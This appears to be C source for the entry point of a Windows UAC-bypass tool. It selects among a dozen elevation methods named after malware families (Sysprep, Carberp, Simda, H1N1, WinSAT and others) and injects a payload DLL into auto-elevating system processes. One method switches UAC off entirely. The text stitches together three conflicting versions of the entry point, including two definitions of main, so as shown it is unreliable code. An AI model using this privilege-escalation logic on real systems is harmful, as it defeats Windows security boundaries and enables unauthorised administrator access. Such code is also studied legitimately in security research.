/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
UINT ucmMain()
{
DWORD bytesIO, dwType, paramLen;
WCHAR *p;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
if (ucmInit() != ERROR_SUCCESS) {
return ERROR_INTERNAL_ERROR;
}
//query windows version
if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
ucmShowMessage(TEXT("This Windows is unsupported."));
return ERROR_NOT_SUPPORTED;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
return ERROR_INVALID_ACCESS;
}
if (ElevType != TokenElevationTypeLimited) {
ucmShowMessage(TEXT("Admin account with limited token required."));
return ERROR_NOT_SUPPORTED;
}
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO == 0) {
return ERROR_INVALID_DATA;
}
dwType = strtoul(szBuffer);
switch (dwType) {
case METHOD_SYSPREP1://cryptbase
if (g_ldp.osver.dwBuildNumber > 9200) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SYSPREP2://shcore
if (g_ldp.osver.dwBuildNumber != 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SYSPREP3://dbgcore
if (g_ldp.osver.dwBuildNumber != 10240) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_OOBE://oobe service
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_REDIRECTEXE:
if (g_ldp.osver.dwBuildNumber > 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
#ifdef _WIN64
ucmShowMessage(WOW64WIN32ONLY);
return ERROR_UNSUPPORTED_TYPE;
#endif
break;
case METHOD_SIMDA:
if (g_ldp.osver.dwBuildNumber >= 10136) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_CARBERP:
if (g_ldp.osver.dwBuildNumber >= 10147) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_CARBERP_EX:
if (g_ldp.osver.dwBuildNumber >= 10147) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_TILON:
if (g_ldp.osver.dwBuildNumber > 9200) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_AVRF:
if (g_ldp.osver.dwBuildNumber >= 10136) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_WINSAT:
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SHIMPATCH:
if (g_ldp.osver.dwBuildNumber > 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
#ifdef _WIN64
ucmShowMessage(WOW64WIN32ONLY);
return ERROR_UNSUPPORTED_TYPE;
#endif
break;
case METHOD_MMC:
break;
case METHOD_H1N1:
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_GENERIC:
break;
}
//prepare command for payload
paramLen = 0;
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, ¶mLen);
if (paramLen > 0) {
if (dwType != METHOD_REDIRECTEXE) {
supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
}
}
switch (dwType) {
case METHOD_SYSPREP1:
case METHOD_SYSPREP2:
case METHOD_SYSPREP3:
case METHOD_OOBE:
case METHOD_TILON:
//
// Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
//
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// Allow only in 32 version.
//
#ifndef _WIN64
case METHOD_REDIRECTEXE:
case METHOD_SHIMPATCH:
if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL )) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
//there is no migmiz in syswow64 in 8+
if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
}
if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
}
if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
case METHOD_AVRF:
#ifndef _DEBUG
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
}
break;
case METHOD_WINSAT:
//
// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
//
if (g_ldp.IsWow64) {
ucmShowMessage(LAZYWOW64UNSUPPORTED);
return ERROR_UNSUPPORTED_TYPE;
}
if (g_ldp.osver.dwBuildNumber < 9200) {
p = L"powrprof.dll";
}
else {
p = L"devobj.dll";
}
if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
}
break;
case METHOD_MMC:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
p = L"elsext.dll";
if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
}
break;
case METHOD_H1N1:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
}
break;
case METHOD_GENERIC:
if (g_ldp.IsWow64) {
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
p = L"ntwdblib.dll";
if (ucmGenericAutoelevation(
METHOD_SQLSRV_TARGETAPP,
p,
(CONST PVOID)INJECTDLL, sizeof(INJECTDLL)))
{
OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
}
break;
}
return ERROR_SUCCESS;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
dwType = METHOD_SYSPREP;
}
if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
dwType = METHOD_SYSPREP_EX;
}
if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
dwType = METHOD_OOBE;
}
#ifndef _WIN64
if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
dwType = METHOD_APPCOMPAT;
}
#endif
if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
dwType = METHOD_SIMDA;
}
if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
dwType = METHOD_CARBERP;
}
if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
dwType = METHOD_CARBERP_EX;
}
}
if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// There is no RedirectEXE for x64.
//
#ifndef _WIN64
case METHOD_APPCOMPAT:
if (ucmAppcompatElevation()) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBoxW(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR *p;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
dwType = strtoul(szBuffer);
switch (dwType) {
case METHOD_SYSPREP:
OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_SYSPREP_EX:
OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
if (osver.dwBuildNumber < 9600) {
MessageBox(GetDesktopWindow(), WINBLUEONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_OOBE:
OutputDebugString(TEXT("[UCM] Oobe\n\r"));
break;
case METHOD_REDIRECTEXE:
OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
case METHOD_SIMDA:
OutputDebugString(TEXT("[UCM] Simda\n\r"));
break;
case METHOD_CARBERP:
OutputDebugString(TEXT("[UCM] Carberp\n\r"));
break;
case METHOD_CARBERP_EX:
OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
break;
case METHOD_TILON:
OutputDebugString(TEXT("[UCM] Tilon\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_AVRF:
OutputDebugString(TEXT("[UCM] AVrf\n\r"));
break;
case METHOD_WINSAT:
OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
break;
case METHOD_SHIMPATCH:
OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
}
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
case METHOD_TILON:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// Allow only in 32 version.
//
#ifndef _WIN64
case METHOD_REDIRECTEXE:
case METHOD_SHIMPATCH:
if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBox(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
}
if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
case METHOD_AVRF:
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
}
break;
case METHOD_WINSAT:
//
// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
//
if (IsWow64) {
MessageBox(GetDesktopWindow(),
TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
if (osver.dwBuildNumber < 9200) {
p = L"powrprof.dll";
}
else {
p = L"devobj.dll";
}
if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
